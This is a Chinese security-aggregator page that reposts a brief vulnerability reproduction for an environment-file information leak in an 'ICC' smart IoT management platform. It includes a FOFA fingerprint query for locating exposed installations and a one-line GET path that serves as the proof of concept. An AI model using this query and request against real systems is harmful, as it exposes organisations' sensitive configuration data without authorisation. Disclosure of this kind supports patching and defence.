欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
设备默认密码查询
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全漏洞某华ICC智能物联综合管理平台env敏感信息泄露

https://cn-sec.com/archives/2903399.html 复制链接复制链接

某华ICC智能物联综合管理平台env敏感信息泄露

2024年7月3日07:49:49评论7 views字数 238阅读0分47秒阅读模式

02 漏洞描述

某华ICC智能物联综合管理平台env敏感信息泄露，通过漏洞攻击者可以获取敏感信息。

03 测绘查询-系统指纹

fofa：body="*客户端会小于800*" || body="/static/fontshd/font-hd.css"

某华ICC智能物联综合管理平台env敏感信息泄露

04 漏洞复现

1、访问漏洞系统

某华ICC智能物联综合管理平台env敏感信息泄露

某华ICC智能物联综合管理平台env敏感信息泄露

漏洞POC

GET访问 URL后面加上漏洞地址
/evo-apigw/dsc-mac/env;.js

原文始发于微信公众号（安羽安全）：【漏洞复现】某华ICC智能物联综合管理平台env敏感信息泄露

https://cn-sec.com/archives/2903399.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

敏感信息泄露
icc
智能物联综合管理平台
安羽安全
漏洞复现

【成功复现】Rejetto HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

Geoserver Xpath 属性名表达式前台RCE漏洞（CVE-2024-36401）

Artifex Ghostscript任意代码执行漏洞（CVE-2024-29510）

CVE-2024-34331：Parallels Repack 权限提升

【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)

GeoServer wfs接口处存在RCE漏洞(CVE-2024-36401)

本文由 admin 发表于 2024年7月3日07:49:49
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
某华ICC智能物联综合管理平台env敏感信息泄露https://cn-sec.com/archives/2903399.html

Brad Soblesky.2 逆向分析&注册机编写

5个尚未被定义的网络安全新盲（方）点（向）

【成功复现】Rejetto HTTP File Server代码执行漏洞(CVE-2024-23692)

Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401)

【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)

用友 U8-cloud api_hr sql注入漏洞

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

厂商·招聘|广告 [长期有效]

[深信服-深蓝攻防实验室]关于红队成长的分享【招聘内推】 06/20 CN-SEC站务

本类热门文章

TurboGate邮件网关漏洞合集 49,173 views 0
斗鱼TV两处功能平行权限漏洞 16,823 views 0
666个政府网站sql注入漏洞的注入点 15,080 views 0
帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757 8,261 views 1
史上最强搜索神器章鱼搜索xss跨站 7,612 views 0
【漏洞预警】奇安信vpn存在未授权管理用户遍历及任意账号密码修改，已复现 6,654 views 2
通用型正方教务（通杀各版本）存在注入（不需登陆）+获得webshell+提权内网漫游 6,602 views 0

安全漏洞

【成功复现】Rejetto HTTP File Server代码执行漏洞(CVE-2024-23692) 07/05 0 views
【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401） 07/05 0 views
[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞 07/04 2 views
Love-Yi情侣网站3.0存在SQL注入漏洞 07/04 14 views
Geoserver JXPath表达式注入致远程代码执行漏洞(CVE-2024-36401) 07/04 9 views
Geoserver Xpath 属性名表达式前台RCE漏洞（CVE-2024-36401） 07/04 9 views
Artifex Ghostscript任意代码执行漏洞（CVE-2024-29510） 07/04 9 views
CVE-2024-34331：Parallels Repack 权限提升 07/04 12 views
【成功复现】Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919) 07/04 16 views
GeoServer wfs接口处存在RCE漏洞(CVE-2024-36401) 07/04 7 views

热门标签

linux payload microsoft 网络攻击文件 java python 渗透测试 windows 网络安全身份验证 app com 公众号远程代码执行漏洞 github 安全 ctf php cwe cve 工具 ip 密码 shellcode 勒索软件攻击 rce 数据安全 https xss 攻击者注入漏洞漏洞预警数据泄露服务器漏洞复现人工智能黑客恶意软件 sql 未分类漏洞信息安全用户代码网络 http sql注入 web

最新文章

【成功复现】Rejetto HTTP File Server代码执行漏洞(CVE-2024-23692) 07/05 0 views
【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401） 07/05 0 views
红队的微信聊天记录提取 | ChatViewTools 07/05 1 views
外包案例：新型共享用工、无书面合同情况下劳动关系的认定，判决公司承担未签订书面劳动合同双倍工资责任！ 07/05 0 views
CVE-2024-32498(CVSS 8.8)：严重 OpenStack 漏洞将云数据暴露给攻击者 07/05 4 views
Wirehark数据分析与取证flag.pcap 07/05 6 views
微软MSHTML漏洞遭遇利用，传送MerkSpy间谍工具 07/05 7 views

大家喜欢

669个大学网站都有注入点 4305/01
揭秘CVE-2024-21111：Oracle VirtualBox 本地权限提升漏洞 2806/12
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章112034 留言 570 访客17821151

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章112034
分类47
标签121901
留言570
链接0
浏览17821151
今日9
本周671
运行3020 天
更新2024-7-5

Copyright © CN-SEC中文网版权所有.

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码